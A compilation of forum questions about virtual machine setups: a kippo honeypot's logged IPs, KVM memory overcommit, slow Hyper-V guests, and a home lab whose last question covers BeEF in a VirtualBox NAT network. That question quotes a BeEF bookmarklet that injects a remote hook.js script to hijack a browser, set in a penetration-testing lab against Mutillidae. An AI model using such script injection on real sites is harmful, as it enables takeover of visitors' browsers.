Honeypot logs VM’s gateway IP instead of incoming ones

There is a virtual machine ( Virtual Box) managed by OS Xubuntu and a kippo( ssh-trap) on this one. NAT have been adjusted in the VM’s setups with port forwarding by this way: ssh tcp 195.x.x.x 22 22 (rule’s name—protocol—current host IP—host port—virtual machine’s IP—VM’s port). The Honeypot logs all connection attempts but writes VM’s gateway IP instead of incoming ones. Can anybody explain how to troubleshoot this problem?

Cant find much documentation regarding over committing of memory for VM’s on a KVM host

Most operating systems do not use 100% of the available RAM all the time, having said that I am unable to find an approximation for this over provisioning. CPU cores is not a constraint for me,

I have a 64 GB KVM host, I would like to provision multiple 8GB machines, the machines remain under utilized for most of the time but always in running state, I would like to know the maximum acceptable number of VM’s that can be provisioned on this setup, without hitting any bottlenecks. The underlying storage is hard disk drives, with no SSD so there is little room for swap memory as it may impact performance

Sluggish Linux VM’s on Hyper-V

I am experiencing very sluggish response with Linux VM’s (Debian) running on Hyper-V on a Windows host (Server 2012 R2).

The VM’s themselves are not running at 100% CPU and the host itself is reporting very low CPU usage (10%) yet each new VM I create seems to run slower and slower.

I’d understand if the host CPU was running high, or the VM itself, but that is not the case.

It seems with each VM I create, responsiveness gets worse, which I understand points to CPU resource, but I cannot see any indicators as to that being the case.

Responsiveness of the host seems fine, no issues. Memory usage is OK, Disk I/O isn’t high… Not sure where to look.

Any pointers would be appreciated, thanks.

Home development server with vm’s

I currently have 2 servers at home and would like to use one of them for development projects and one of them for a NAS.

Now I want to be able to make vm’s on the dev server so I can have a staging environment which can be piped then to production.

I want to be able to use the same server with the vm’s to develop from (must feel like using my own laptop)

How should I achieve this?

How to set up a beef hook on another VM’s browser in a NAT Network in VirtualBox

I’m reading “Practical Web Penetration Testing”. I’m using VirtualBox to run two VMs: Windows 7 with Mutillidae and KaliLinux where I want to use Beef. Both are connected to a Nat Network

As it’s said in the book, I set up the KaliLinux to have a static IP by modifying /etc/network/interfaces:

source /etc/network/interfaces.d/*  # The loopback network interface auto lo iface lo inet loopback  #Static IP Address auto eth0 iface eth0 inet static     address     netmask     network     broadcast     gateway 

My Windows VM has IP

I’m now trying to set up beef. When I open a tab on each of these VMs browsers to I do indeed get the browsers hooked as online browsers in the beef ui panel.

But I want to have a hook on Mutillidae. There’s a button for that to copy as a bookmark to append the hook.js file for a given webpage: javascript: (function () { var url = '';if (typeof beef == 'undefined') { var bf = document.createElement('script'); bf.type = 'text/javascript'; bf.src = url; document.body.appendChild(bf);}})();

When I run on that on either VMs browsers – opened on -, it doesn’t work. The hook.js file does get loaded, I can see it on firebug. But the browser never gets “hooked”: I can’t see it on the beef panel.

I even modified this portion of /etc/beef-xss/config.yaml:

# Reverse Proxy / NAT         # If BeEF is running behind a reverse proxy or NAT         #  set the public hostname and port here         public: ""      # public hostname/IP address         #public_port: "" # experimental 

And did some research but nothing…

Some weird stuff (or is that normal?):

From Kali

ping    - OK ping     - KO --> But I can access ! ping     - OK ping  -b - KO --> shouldn't I get answers from myself and gateway at least? 

From W7

ping    - OK --> So it works in that direction but not in the other? And I can access beef's panel, demo, or hook.js ping     - OK ping     - OK ping     - KO --> Reply from Destination host unreachable. Is this why Kali can't access W7? 

Why can’t I set up a hook in Mutillidae on Win7 VM connected to the same Nat Network as Kali VM running beef?


If you need more details to help me out, don’t hesitate. I’ll edit my question to help you help me.